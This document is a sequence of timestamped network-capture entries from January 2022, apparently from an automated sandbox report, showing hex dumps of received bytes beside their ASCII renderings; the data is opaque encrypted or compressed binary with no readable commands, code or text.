                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2009INData Raw: d3 a6 fc 65 08 7e 23 d6 3a 87 b8 b3 0d 07 ed 0d 70 03 bf 51 ec fa ac 47 b1 13 28 18 1f ed 75 d7 6d 10 3b 14 66 06 0c 06 57 0b 28 63 d3 33 80 e7 ba 46 18 be 19 05 c6 ff 49 31 cf e3 34 db d2 08 a2 3e 41 20 ff 21 2b 67 f7 e5 68 6a a6 16 a4 4b c9 02 f1 aa e5 aa 19 2a 63 d6 80 83 47 d3 87 39 e1 b3 13 b7 d1 51 fb 80 78 6a 63 19 f1 a6 12 75 34 b0 1d 84 62 fb 21 c2 e3 e6 1f 67 60 8f 79 ad ed 90 b0 e7 1c dc 25 55 88 08 04 24 03 73 e4 2a 00 a9 a6 3d 4a d9 aa 20 8f 5e 9f d0 3a f9 a7 5b d3 02 f2 20 d5 1c e4 28 12 4e 87 9d a2 c6 b8 39 96 30 1c f2 1f 9b d3 6c 6d a0 78 45 d1 44 72 46 54 52 5b 89 65 95 12 f2 b7 77 36 b1 88 b9 b1 f3 cd 2b 24 5a 1a 4f ac 46 cc 07 b5 aa 45 d1 c4 c5 40 42 04 14 d2 00 c4 f6 45 1e 46 35 17 11 e1 1b 0e f1 d0 db 32 13 78 b4 e9 fa 11 be 09 9c db
                                                                                                                                                                                                    Data Ascii: e~#:pQG(um;fW(c3FI14>A !+ghjK*cG9Qxjcu4b!g`y%U$s*=J ^:[ (N90lmxEDrFTR[ew6+$ZOFE@BEF52x
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2025INData Raw: a4 d6 b2 bc 18 79 b4 07 40 a6 86 08 87 b9 02 02 53 96 39 b1 22 78 fa 7e 7f 12 28 1f 0d 90 2e 8f 25 4e 5b bb 5f 7d 9a 18 e5 87 2a 4b 05 52 6a 45 9d 8c 76 92 24 52 c2 2d 42 c4 2c 7b 5d 83 23 69 2b 07 b0 7a 83 19 e6 74 e9 14 10 58 e2 1e 5e 00 e8 60 14 b1 2e 44 bb de 8a 88 6d bd 54 f1 cc b9 8e cb 2d 10 08 2d 2d 2b 50 f0 00 80 ed 8f 8d d0 a1 50 a0 0e bd 69 e5 0d 41 1d 8d 21 5e 75 35 96 44 5c 32 cc 35 3b 41 da f7 3f 8d 79 5b 1f 76 7a e9 1a e3 5f 16 93 4c 6a 05 d2 d4 8c dd 8d d4 04 f2 4e aa 49 ad c5 79 8f 8f 5d 6d 59 3e fe 8b a8 a5 af 5a 7a 21 5c 81 7c 45 15 39 35 b9 0b fa 2e 45 37 73 de 6d 6b 03 24 9a 90 2f 0e 1b ef ad c7 cd 7b 98 2c aa 2d f4 01 2a e4 f1 bd 29 ed da 86 07 8a 02 e2 94 17 74 c0 aa b7 6a 6b 3e b2 25 26 7f fb 08 c6 bc b2 f8 36 68 80 3e 30 c4 8e f6
                                                                                                                                                                                                    Data Ascii: y@S9"x~(.%N[_}*KRjEv$R-B,{]#i+ztX^`.DmT---+PPiA!^u5D\25;A?y[vz_LjNIy]mY>Zz!\|E95.E7smk$/{,-*)tjk>%&6h>0
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2041INData Raw: 86 16 71 84 02 bb c3 21 10 d6 d0 f2 61 58 c1 85 ab ed 9c fb e0 ce bb 5c 2a 18 96 8b 2b bc 31 fd 0b 22 9d 9d 4f 60 58 fe 23 7b 6a 5c 23 dc 92 b8 05 a9 37 cc ff 4a 2f 30 0a aa 35 f5 91 00 ab 2f ac 6a 1e e7 3d ec c2 79 4a 70 87 e5 38 82 17 49 92 60 d8 e5 8e d1 bf f8 05 14 24 a6 9a df a7 ae cc 2b db 95 82 95 92 f6 f9 d9 88 25 6d 6c 3e 39 92 1c 4e da b6 4d 2c bb 2e 1b bf f9 59 17 e7 e0 e8 08 ee f9 3a 5d fe 4f b8 f8 ed 6a 86 c7 6d 4f 16 75 dd 58 0a 97 c6 1b 94 b2 02 30 a1 bc 7c 51 0c be b4 8e ed 4a 41 6a d6 1d 22 1e 29 c8 3e 95 c0 d3 0f 1f 56 69 55 5e 42 9e 21 27 15 83 37 31 74 95 79 a0 0d ff 29 56 08 09 ff 49 e1 7a 01 48 fe 36 03 a5 07 e0 1e 07 da 99 a8 15 c6 36 fe 66 3c 31 37 d1 27 27 dd 61 d1 ae bc d5 80 69 05 91 85 d5 75 57 35 15 75 0a a9 23 21 16 29 59 11
                                                                                                                                                                                                    Data Ascii: q!aX\*+1"O`X#{j\#7J/05/j=yJp8I`$+%ml>9NM,.Y:]OjmOuX0|QJAj")>ViU^B!'71ty)VIzH66f<17''aiuW5u#!)Y
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2057INData Raw: 35 43 68 2c 7b 36 bc 56 e3 b6 dc 49 21 59 cb b9 cd 09 f8 d3 5f 45 25 73 ac e3 18 92 80 91 83 e9 e6 aa ba c4 a0 47 d5 73 ae c2 a6 d2 12 2d 2c 85 ea 6a f0 eb e6 31 87 c6 67 d4 20 15 35 9c ac 54 c0 ad 8d 08 e0 a9 24 a7 85 19 11 af 0c 26 ef 86 55 06 cc 42 88 b9 70 ea 7b 59 eb 5f 6b 57 f4 60 a9 ab 28 6b 57 33 9d 53 a0 2d 5a 69 21 0a 52 bc c1 6e 70 e9 4f 0e ba cd e2 2a ff 8b 0e 04 ab e4 d6 85 a7 b2 f6 7a 17 ef 03 8a fb 80 43 00 df 27 f0 ba ea 34 e4 67 e2 b2 c5 75 fa e8 f3 50 c8 41 e0 80 a4 10 6e 19 6a 22 a6 fb c6 ea c3 5a 43 23 f6 90 2f 26 90 4e bf 99 5e 93 22 e2 d0 63 ef f1 05 fa e6 17 6c 4a cb 62 3c d8 66 ae 25 7b cd 59 5d 64 d6 a7 43 9d 20 3e 12 20 90 fd bb 6d 15 0b 1d 87 93 b4 b2 fa 21 9c 0e 94 f8 5b 14 63 4d 3c 2e 4e ff 96 fe bc 64 5c 50 ff f5 3f db 3f a5
                                                                                                                                                                                                    Data Ascii: 5Ch,{6VI!Y_E%sGs-,j1g 5T$&UBp{Y_kW`(kW3S-Zi!RnpO*zC'4guPAnj"ZC#/&N^"clJb<f%{Y]dC > m![cM<.Nd\P??
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2073INData Raw: 93 73 3b 01 0f 84 24 5d 4a 07 fb a3 a0 a6 8b 20 f9 73 94 4d c1 41 d0 90 50 4f 98 d0 49 d7 1e a2 1d 14 12 70 e4 b2 f2 59 f4 fd 8c 03 a9 c6 6e fd a0 7f e2 22 1c de 45 6c af a6 da 12 c2 0c 69 30 4d 57 f0 72 cf b7 e3 6c c6 8b e0 76 5d 8d a3 69 da af f8 46 cd c0 31 bd 86 42 12 99 5a 86 b5 10 36 0b b1 6f 36 bd 84 12 f3 4a 17 66 67 a7 c5 20 2d 96 61 61 a1 30 e5 2d a0 8a 49 d8 59 2d 42 a2 27 86 21 de 38 34 36 c7 9d ca a5 02 91 77 77 c9 a2 6e 2a e3 9b 8b b7 50 c0 db 03 da 5c 53 b5 0f 06 69 19 2a 0a c1 e1 0a 79 0c 3f 63 e2 87 c1 88 97 29 dc db c2 c6 9b 28 19 8c c0 1d c7 60 ac 49 1e a5 2b c8 a5 a2 dd d9 9e 0d 75 b8 53 9c 02 f6 ea d6 3d 7f 4e cd 9b 3f f1 8c ec 01 2a db 2d 8d 6b 05 16 4b 22 a1 81 97 18 2a 02 af 25 22 67 4e c3 29 e0 57 a5 43 02 2c 4f 99 9c 17 b4 0b ec
                                                                                                                                                                                                    Data Ascii: s;$]J sMAPOIpYn"Eli0MWrlv]iF1BZ6o6Jfg -aa0-IY-B'!846wwn*P\Si*y?c)(`I+uS=N?*-kK"*%"gN)WC,O
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2089INData Raw: 9d 23 58 af 52 08 63 74 b5 f1 c9 6d eb 1b 73 d4 16 6f d7 48 d9 ce 24 7f 0e 54 34 66 f8 45 5a 1b 2b 15 7c 60 b4 22 bb 10 e8 f3 16 eb 33 d8 d4 5e 13 8b 5a 88 ac 2c 76 56 50 1b 82 f9 50 91 f9 4c 94 17 44 97 f5 80 82 e2 df 70 e4 3c 62 34 f7 92 ef 20 cf e9 52 07 f3 b6 29 e6 29 83 5e 23 db c4 ab 83 89 c4 00 6e 1a 20 d2 81 fe 2f 93 7f 65 a6 b7 6a 63 1d 86 e0 a9 c6 8b e3 9b 27 ba 89 e3 f5 56 4f 94 40 1f 2e 38 d9 96 99 20 39 00 7b 49 71 51 09 63 ea 65 c0 c1 66 a9 12 a3 55 09 e7 db e0 13 44 e9 89 f7 99 ab 90 a1 b5 1d cc 59 b4 39 91 1b 96 3e d2 e5 80 2c d5 94 84 24 f4 aa e2 58 ad 1e 0e 04 4c a7 be 0b b9 f7 f0 b2 43 52 c6 b7 a0 e4 0a f8 79 08 ef 0f 97 04 69 8f 71 a9 fa a7 21 d2 f2 d0 be c4 3d ee 6a 9f 0b 44 06 f0 6f 57 ff 1b 35 4b ba 85 1a 85 3b 98 fc 11 66 ce 5b 76
                                                                                                                                                                                                    Data Ascii: #XRctmsoH$T4fEZ+|`"3^Z,vVPPLDp<b4 R))^#n /ejc'VO@.8 9{IqQcefUDY9>,$XLCRyiq!=jDoW5K;f[v
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2105INData Raw: 9b 35 9f 39 85 a2 82 0a 80 c6 6f de f0 54 6d 3e 26 b8 85 f2 e1 29 9d b4 d3 ac 09 e1 db 6a 0d 2c 9b f8 42 2b 0d 1c 24 fe e9 4f 91 c3 be 12 69 33 de 66 97 79 e4 31 5d 32 53 77 0a 27 55 19 a1 0c 5c 85 4e 5d c9 36 e8 51 99 08 db 94 e5 69 cb f1 4e ca 01 6a a7 84 16 50 61 5a 85 dc 96 e6 8a 5d 96 59 32 15 ce 1a b9 bd 95 62 4c f8 6f 1a 86 06 b6 2d 66 2a 52 48 58 56 d7 cd 88 1e 96 f1 34 70 93 83 27 63 5c f7 ba 93 4e 91 61 8b 2d 56 b9 0b 8f 86 3b 4c 6b de 1a db 0b 2b bb 9b 76 31 bf f0 83 64 d2 74 9f cb e9 75 43 17 a1 32 47 90 7a 51 51 52 a2 48 ff d9 ec ce 96 48 ff c3 e6 16 68 a6 c5 6a 28 2a 38 ff 39 d6 2e c5 6b b9 7c f7 f5 34 5d b3 12 41 81 cc 6d f0 6d bd ac 60 4b a8 9c 7e c4 ba 59 1d 95 0b d2 bb 05 1c 1a d4 fb 40 a4 21 17 0e 18 0e 6a 2d 36 26 f4 39 da 2c bc 05 f6
                                                                                                                                                                                                    Data Ascii: 59oTm>&)j,B+$Oi3fy1]2Sw'U\N]6QiNjPaZ]Y2bLo-f*RHXV4p'c\Na-V;Lk+v1dtuC2GzQQRHHhj(*89.k|4]Amm`K~Y@!j-6&9,
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2121INData Raw: 7a d8 44 a4 ec 0b e2 2c b9 7b e4 70 3f 8e 60 12 df 2a 11 18 48 89 6d ff 72 52 a2 6f 8c 9a 28 d1 b1 da a0 4c d4 87 dd 8f 0a a9 56 0b 49 f7 9f eb 52 6b 4e 05 61 60 4a 3e ce ef 61 c3 72 3d 95 7c 2d 6e 1d 39 27 89 a4 0b e6 b0 79 4c f2 69 5c 41 b4 0c 95 ed 70 73 ab bc c7 f8 be 0e 5c 06 73 c8 49 d4 fa b5 27 23 e0 d7 2a a5 6d 4e 3a 4b e1 da 3a 0d 45 96 ee d0 87 f6 bc e7 42 e1 9f 8f dc 36 db 1c bb f3 f1 84 d3 c7 ea df db 53 82 2c 39 c5 64 92 00 61 ea 19 ab 64 b5 98 60 3e 64 c1 4b d2 c9 25 2b 98 5a 7f 70 66 a9 33 4f df d8 e9 4e 58 17 96 56 97 50 4c b2 a4 0f fa 53 8b 7b f8 a0 6f 9f 1c fc 65 e9 e7 74 80 5e 8f 96 43 f8 57 13 c2 6a 89 9c f1 90 f1 6d c9 a2 34 7f e8 da aa f9 08 ef bd ee 69 2f f8 4e f3 1d a9 61 e6 2a 57 c4 ba 1d 58 76 cf 1d 25 6f 7f 89 80 12 92 ce cc 9d
                                                                                                                                                                                                    Data Ascii: zD,{p?`*HmrRo(LVIRkNa`J>ar=|-n9'yLi\Aps\sI'#*mN:K:EB6S,9dad`>dK%+Zpf3ONXVPLS{oet^CWjm4i/Na*WXv%o
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2137INData Raw: 92 db 98 bf 72 4b c2 c5 d5 b4 0f 8d b3 27 ba db 03 8d b3 4d 84 ec b9 0b a1 58 f4 b5 19 a5 ed ee 3f 69 8d 01 6b 64 17 c1 0b a7 b9 ed ac 56 9c 5d ab c5 26 48 98 c7 36 bf ee a5 8e 75 21 e7 7e a4 73 df 39 9f 6f b0 bd de f5 8d 35 2a 84 c2 cf 2f 1d 5c f7 13 30 b0 03 94 90 e1 4f 45 e9 7d 5d bd 46 31 d7 fb 7a 3d 0f 00 d4 d1 98 45 5f f3 e9 1c 54 d0 31 44 b9 45 94 46 b8 fc 91 ca 9b d7 8f 2f e4 0a 6d 53 88 db c1 f5 1b 1b 0a c0 b2 1c f8 7e a7 82 9e 11 7f 38 8a 8a bd 70 cd d5 73 6e db af 07 de b2 27 04 56 22 d5 72 ad 63 4b a5 1c 7e 33 4b 7e 40 97 1b 1b ec c4 95 2b f9 03 e3 84 63 aa 73 b7 d7 55 e4 5b fc 3c 55 e6 8d 9a 35 c1 98 d2 07 5a ca 93 18 ba 42 45 7c 2c ce 7c ca 4e 97 36 60 22 0e a2 90 18 cc ea ca 9d 60 3b 6b f7 38 1d 18 0f b9 50 ba 5a a3 62 03 04 10 80 68 8a ef
                                                                                                                                                                                                    Data Ascii: rK'MX?ikdV]&H6u!~s9o5*/\0OE}]F1z=E_T1DEF/mS~8psn'V"rcK~3K~@+csU[<U5ZBE|,|N6`"`;k8PZbh
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2153INData Raw: 85 49 f2 c4 31 32 18 72 90 e8 5e f0 25 a1 4b 78 25 12 63 3b 86 41 31 d5 f9 bf 59 c3 c6 66 be 0f ea 64 8d d5 e2 36 71 b3 d2 16 bd be 0e 81 db 1c 81 16 37 53 e3 5e 87 23 eb 1b 40 6f fc a9 ff a1 b2 24 cb 6d a5 b4 a0 9e ac 5f f7 21 f0 18 a1 0e 43 dd 39 f5 ac ce b8 1f 17 67 7f 14 43 90 47 22 57 5b 5f 1c ec b6 2e e7 90 50 e9 2c 3d b5 89 0a 8b c5 3c 33 71 c0 a9 2a b0 3b 1a d7 12 3a 70 b0 73 ec 75 02 04 ed ad f0 07 01 ae 13 bc 8e 6f 62 e5 c9 52 c3 31 73 5a 76 29 1e 4d a4 f8 3a 70 d9 11 65 57 44 2f a6 11 ab c5 d5 16 af 0b b0 36 fa ed f8 9d 6e 3a b7 83 66 9b 5d 7e 3f 5c 24 1c a2 18 89 12 f3 c4 c6 99 6c fe a7 79 00 cb 86 b8 18 eb fd 7d 29 fa a3 42 1e 94 3d e1 10 0c 35 5b 5c ca 9f 63 22 ff b4 0e 26 de d9 bb 94 dd 2f b0 43 d6 82 31 2c c1 0c a0 91 26 e5 2a 67 b4 c5 27
                                                                                                                                                                                                    Data Ascii: I12r^%Kx%c;A1Yfd6q7S^#@o$m_!C9gCG"W[_.P,=<3q*;:psuobR1sZv)M:peWD/6n:f]~?\$ly})B=5[\c"&/C1,&*g'
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2169INData Raw: 9e 97 73 17 ad a7 3b 95 9b 2a bd 75 5f b6 96 58 dc e8 8a 34 6e 41 bc b1 7d e6 31 ff dc 61 5f e6 b0 9d c2 90 cb c8 b0 d0 77 63 bf d2 58 00 22 03 8b f8 b8 36 d1 d1 08 cf 1c 88 28 e7 6a d3 3b 3f 9c 2d d3 b2 e9 a9 12 8a 72 21 2d 94 2e 6e 14 15 59 5f e8 98 9a 78 85 25 4b d0 62 ab 45 97 56 ad f3 19 ec 2a 7f c7 ed e9 5e 80 eb de 85 a8 5d 20 e1 45 be 9c b2 ec 95 97 a4 c4 50 dd 2a 2f 91 68 a4 6d cd 93 3f 72 22 77 50 70 2e aa 7b 11 5f 76 fb 04 14 a2 05 9e be ca 18 fc 9b cb de 89 ea 1a fa 1b d3 cb 03 e5 ef 2e e8 af 2d 38 9b 93 56 8d 32 44 c9 7a 97 46 2b 1d e3 44 54 31 87 74 af 79 2d c0 c3 23 1c 70 5b f1 a2 06 e6 b8 a1 97 4d 0c f4 e0 39 c7 c9 d0 a7 76 9a c4 7c 6f db 4a 65 d6 69 f1 e7 e7 09 ee 9d 6b e1 12 14 2c 34 4d 06 d7 82 90 de c8 46 50 2f 7c 76 14 98 bb 2a bd 41
                                                                                                                                                                                                    Data Ascii: s;*u_X4nA}1a_wcX"6(j;?-r!-.nY_x%KbEV*^] EP*/hm?r"wPp.{_v.-8V2DzF+DT1ty-#p[M9v|oJeik,4MFP/|v*A
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2185INData Raw: 3a dd ab 66 e6 81 f7 ff e2 1e 80 b3 18 8a 54 06 fe a6 ce 8d 42 ac 70 a0 7c 7b 79 fd 95 17 e5 92 3a 23 4c 82 66 46 38 93 00 61 22 02 9a f6 61 55 82 55 7e c9 8d 6b a4 a4 6a 39 cb 60 db 9e bb 09 ec 88 83 a7 2d b5 c8 59 cd a0 f4 a2 44 94 be ab 04 14 3f cf 4c e5 fd 85 65 ce 50 81 1d f4 85 e7 1f 1c 5c d3 8c 7e 97 18 13 7e a2 a2 f2 1e fd 10 5d 70 f7 bb 56 13 f6 78 89 91 1f 68 e5 40 6b 0b 6b 40 99 ae a3 bc 75 57 94 75 5a de 54 bd a5 0b 2e 15 a9 cc b6 d1 4e a1 42 0f 8d 40 84 22 88 00 d0 63 b3 1c 10 f4 f8 cf 6c 69 b2 84 4e e0 a2 1f 0b f3 f1 b9 5d 5c b1 10 35 44 fc 23 06 f7 96 8e 37 6d 7c 19 cb af f0 e2 0b 1c 44 c3 93 d9 eb 0a eb df 76 f0 3f f1 25 8d c7 f1 2f c2 87 0e d8 89 a8 24 bf de ec 03 48 be 04 96 8a 07 63 3e 7d 88 3d bf b8 c0 e2 13 0a c3 bd 13 d0 20 92 80 b7
                                                                                                                                                                                                    Data Ascii: :fTBp|{y:#LfF8a"aUU~kj9`-YD?LeP\~~]pVxh@kk@uWuZT.NB@"cliN]\5D#7m|Dv?%/$Hc>}=
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2201INData Raw: ac 39 69 cd b9 bd ab d4 56 a9 23 6c f1 84 08 43 b1 36 02 28 79 f8 a2 1b a0 43 2f 40 46 62 55 1b 9b 89 50 b5 da 9f 83 db bb f6 14 f3 5e 18 32 f3 c4 dc 0e b8 6c 77 c4 81 50 55 bd 4f cf 7e fc dd 16 ee 2c 86 71 8a 0b ce 5e 0a e7 bb fd 48 44 5d 6c a3 58 2c 2e f0 66 50 15 b9 46 4c 1f 4e e0 f9 9b a2 82 02 fd 3e a7 ab b2 96 c1 08 b3 dd 60 f4 52 83 01 4c 23 63 41 d8 aa 3b f4 14 1f d3 62 77 5d e8 ab c2 1a 09 1c 6f 97 76 d7 b0 44 80 98 33 da 47 f1 0d 95 6a 0a 19 28 61 52 c8 06 e5 48 73 ce 12 6b e5 22 cb 2a c1 83 c4 44 f7 84 96 fc f9 3f 66 29 ee 4e 30 61 02 74 8d f8 4c cc b4 70 17 82 aa 96 bb 13 f1 2f 7e 24 18 23 7b 10 09 f2 23 97 09 84 8a 0d dd 9a 9c 95 79 64 1f 38 13 40 ed 5e b5 e6 df 27 84 35 3f 06 38 5a 31 81 69 6e c9 3d 45 dc 4e 5d b4 44 8f bb 4c f9 01 f2 32 6d
                                                                                                                                                                                                    Data Ascii: 9iV#lC6(yC/@FbUP^2lwPUO~,q^HD]lX,.fPFLN>`RL#cA;bw]ovD3Gj(aRHsk"*D?f)N0atLp/~$#{#yd8@^'5?8Z1in=EN]DL2m
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2217INData Raw: a7 85 91 11 ec 03 1c 66 0a c9 d3 39 ba 8b f2 73 ea 56 7d 6b 7f ae f9 03 3a 32 c0 65 19 ca 48 7d 4d 8c 2a ba 79 b2 b0 d4 c7 6e 34 06 df f3 08 9b 9f 94 53 9a ca 84 33 1d cb e0 a0 1c 8d 5e fe 42 b8 2f 92 03 40 0e 36 f7 66 ae 17 a2 ea d0 5c e9 43 dc d4 2e 1f 8f 5e 29 a4 34 45 9b 5d ad aa 20 26 57 2e 5f cb 99 63 b4 72 19 ec 57 ab 85 44 23 84 6a 78 31 ae 89 ee 5c 0f 24 0d 6b 54 83 f3 e0 16 20 cf fd 6c e2 f6 7d 26 9c fe 5a 5c 9f b5 0b a0 64 e6 3f d0 86 69 9f bf 88 a7 4b 73 98 be f5 a2 68 7c 0b 5c 95 c3 83 08 8e e6 ae 9a fc 85 f2 de 33 f0 35 3d 55 37 9c 46 d4 b7 6b 00 07 b9 e1 c0 d6 ec cb 78 d2 1b 16 ce 03 55 63 86 cd 34 99 28 f4 70 2a 0f 8d 30 62 0e 2d 7b a1 c0 17 6f 57 3b 14 f8 c4 07 f4 9b 66 7c a0 e0 0c cc 6e 3a 88 0d 6b e9 db 94 38 fc b0 ad ab ba 5c 48 dd cb
                                                                                                                                                                                                    Data Ascii: f9sV}k:2eH}M*yn4S3^B/@6f\C.^)4E] &W._crWD#jx1\$kT l}&Z\d?iKsh|\35=U7FkxUc4(p*0b-{oW;f|n:k8\H
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2233INData Raw: 3a 67 28 4e 22 9d c3 db 9d fc bd c3 3c 81 7a fe 6a 47 d5 bc b5 46 29 c7 0a bc b4 d2 e4 d5 06 54 77 7a 08 38 c0 88 4d 07 1f 83 bf 5e d6 d6 ae c5 04 37 af 0d 81 42 6b ef 98 99 b8 8e 94 ce d8 a7 b2 61 f7 b7 9c 9f 73 19 68 41 f3 1a da c7 0a 02 f8 2e 02 48 4f 0b 27 13 ec 9f 85 81 3a ec 37 18 f9 43 b6 7e c8 78 f1 ea c7 85 d6 b5 57 72 80 c6 22 e0 47 a8 5c c8 c7 1b 8a 8b f3 71 ec 8b 59 0e df 56 7c 5d dd c2 e8 2f e7 e4 61 68 de c0 a1 aa 1d 78 28 7d 7b 68 0b 66 7d 7f 77 45 94 5b d0 ab de 44 4d 3c 77 cc de fe 82 6f 86 78 9d a4 5f ab 1c 19 fa b5 88 c6 95 77 05 ba 38 20 e0 76 35 7b ce 18 7e 49 60 ed 32 85 90 5f 72 e6 50 73 8f d8 9b 9e 6d 0c 9d e6 72 30 27 c6 6d c5 d6 0e 97 80 3f 4a 1d e5 5b b9 17 17 df e7 5e 4c 80 a8 fc f2 e6 62 99 9d 6e 3c 70 d7 5b d2 b0 d7 8c b9 26
                                                                                                                                                                                                    Data Ascii: :g(N"<zjGF)Twz8M^7BkashA.HO':7C~xWr"G\qYV|]/ahx(}{hf}wE[DM<wox_w8 v5{~I`2_rPsmr0'm?J[^Lbn<p[&
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2249INData Raw: 06 39 85 21 59 86 9e a3 15 3d 25 33 b6 56 49 e1 47 35 cd 92 e3 15 ac 40 be 81 c4 f3 2a 9a c9 09 aa de e1 74 a8 c0 2f bd fe a7 62 50 5d e3 7a d5 bd 90 e2 8d 6f b2 1b 51 75 ee cb a5 6e bc c5 87 88 f3 79 9d 43 fd 1d 80 80 fd 5d ef b7 70 f3 e4 f0 cb af 8e 85 19 7c d8 56 56 34 52 10 1f 5e 68 3b 35 86 65 94 55 53 d7 ea 8c 85 b4 eb 89 be 83 c1 c8 d2 e5 e2 af 48 7a 91 47 52 92 8e 54 bd a1 ee 33 1b eb 3b 31 cc 66 e3 f1 91 8e 72 0b 7f bb 48 55 2e 2d 1e ef 7f 63 43 1b 13 23 32 47 f7 c6 31 d3 6b 69 a8 6b b4 27 16 ba d8 d0 a0 81 7d 0e 89 a2 b8 7a 5a 6d 92 c5 2b 2e f1 4d ef fb f4 4f 8d 87 10 eb 5b 39 c0 a8 b9 bb 2b 07 16 19 2a de 45 db f8 ca a4 e3 5f 25 ac 5e 3d b1 18 25 6a 6c e3 c9 a0 6a 42 ab f8 59 f5 70 fa 5d 4b fa 67 15 b1 cb ba c2 a4 5f 91 3e da 08 30 3a 4c 62 f8
                                                                                                                                                                                                    Data Ascii: 9!Y=%3VIG5@*t/bP]zoQunyC]p|VV4R^h;5eUSHzGRT3;1frHU.-cC#2G1kik'}zZm+.MO[9+*E_%^=%jljBYp]Kg_>0:Lb
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2265INData Raw: 43 93 b8 d8 9d f6 f6 a3 06 03 28 17 37 f7 01 42 c5 20 54 05 7a aa b8 89 d8 7b e5 4d 61 2d f5 85 38 b6 16 a2 73 f8 ca b7 9e ec ba ec 41 74 26 e1 57 b5 3f 1a c3 05 03 a4 c1 a3 3f df 48 b7 e1 70 d8 b2 48 26 cc 86 8e 85 99 16 d6 c7 4c fc b7 23 ab 5d 1f 79 29 ea d3 bc e7 e1 e9 fb c8 c4 73 f0 33 81 d1 eb 93 b3 9c 16 7b 4b 8f 1b d5 0e 1c 58 20 b5 1f 27 90 cd ff 89 5b 96 43 c3 10 ec a0 64 c4 05 b0 94 30 74 50 69 85 f9 1a 27 06 58 b4 76 74 02 c9 0b 99 67 52 97 e6 07 60 e8 83 50 c2 04 35 f0 b1 ea f3 87 34 0e 2b ff 82 7c 7e 8c 9e 31 dd a0 8d e4 e6 35 1f 0e 3b c6 bc 8c 60 a1 62 1a fa 49 4f 64 b9 af 52 72 3a e3 a3 62 ae 71 8f f5 49 19 f9 cd 52 aa e4 06 a1 9b 41 65 9c 93 cf 5b a7 b5 b1 01 ca 21 ff 6f f8 8e 23 a3 83 e0 89 0a df b8 d6 a0 66 1e 8a 12 23 4d 37 60 96 03 1a
                                                                                                                                                                                                    Data Ascii: C(7B Tz{Ma-8sAt&W??HpH&L#]y)s3{KX '[Cd0tPi'XvtgR`P54+|~15;`bIOdRr:bqIRAe[!o#f#M7`
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2281INData Raw: b5 fa 91 8c 90 22 68 42 8c 74 10 74 e2 81 67 66 4e 2b 27 aa 68 32 e9 47 7a c7 8a 99 4d 4f 32 35 64 9b a0 11 d7 9a 7f cb 8c fc ca 32 f0 b0 34 a1 30 fb 39 16 e3 c8 7c 9c e2 c2 30 6e 65 7e 3d 29 12 68 b6 59 4e 21 4f ad 24 2d ac ea bf 89 13 71 ae d1 7b 18 71 43 05 55 8d 79 eb 6b a2 28 97 d5 16 14 26 27 38 3f 6b a2 00 19 82 7f 0f 7b fc e0 3b b5 c1 52 54 18 ec 63 a5 75 78 5f 6f 38 b3 32 1f ce ba ab df 45 40 fa a7 2a dc 0e 9b 12 22 d2 fd f5 3a f1 15 32 84 d8 5a 54 fe 48 1f 30 56 a0 24 1d a8 f8 78 ad ae c0 2a 5d aa 21 bf d3 9a c6 c4 8b 9c aa f2 09 15 60 cf a9 10 f9 8a d4 e5 b0 27 32 34 b7 2e 00 dc 55 fa 7e 18 d2 b7 79 af 75 fa b9 ad 59 3e 29 07 42 6c 60 e4 d4 c9 8f f3 42 1d ea c0 fd 70 25 6a 19 fa 4a fe 93 87 4b 82 e3 04 a6 5c f1 4d 1f d4 12 9c fd f4 76 4f 0a bb
                                                                                                                                                                                                    Data Ascii: "hBttgfN+'h2GzMO25d2409|0ne~=)hYN!O$-q{qCUyk(&'8?k{;RTcux_o82E@*":2ZTH0V$x*]!`'24.U~yuY>)Bl`Bp%jJK\MvO
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC2297INData Raw: e6 f2 80 65 75 02 e9 8c 9a 8e b1 1c 45 54 bd 16 8f 22 8f 23 28 13 ca c6 fe 6d 16 4b d9 6b df cd f0 b8 2f 47 23 8a bf ea d7 65 9c 9a 3f eb 10 de 01 d0 96 82 a7 e8 7c c8 cf e8 ab ac f0 b2 f6 f5 d5 8b f6 9b 41 f9 79 df 19 90 75 e1 3f 88 ac 5f 1a 73 c7 85 b0 4a 43 64 7c 32 ec 23 24 a6 8e 5c 9d f3 ae 48 37 f5 9c 27 cf 83 d8 a2 80 5f 5c 36 e5 78 44 e9 f3 03 e9 27 43 3f 48 d0 ac b5 26 1e 7a a0 e8 10 81 99 d9 bf 7a 9f d9 b1 df 2b 05 f1 da d9 17 9f 49 e6 e1 a9 6d 98 76 11 46 5a ec c3 c5 40 42 3a 9e 7f dd 01 33 6d 5e e5 78 16 52 65 1e ad 57 cc b2 d1 aa 73 03 4f 51 fc 2f de 81 0b 4c 7a 11 ce 22 46 9c 8c b2 35 86 bb d0 1a ea 6f cc f5 34 67 1d a3 3e 21 b3 c2 69 1a 41 07 66 24 cb a5 0e 72 9c 89 b2 d6 9d 8f a1 7f 13 9d 71 10 3b 23 c2 79 e7 5b 18 cf d2 c7 b3 33 bb 0a be
                                                                                                                                                                                                    Data Ascii: euET"#(mKk/G#e?|Ayu?_sJCd|2#$\H7'_\6xD'C?H&zz+ImvFZ@B:3m^xReWsOQ/Lz"F5o4g>!iAf$rq;#y[3
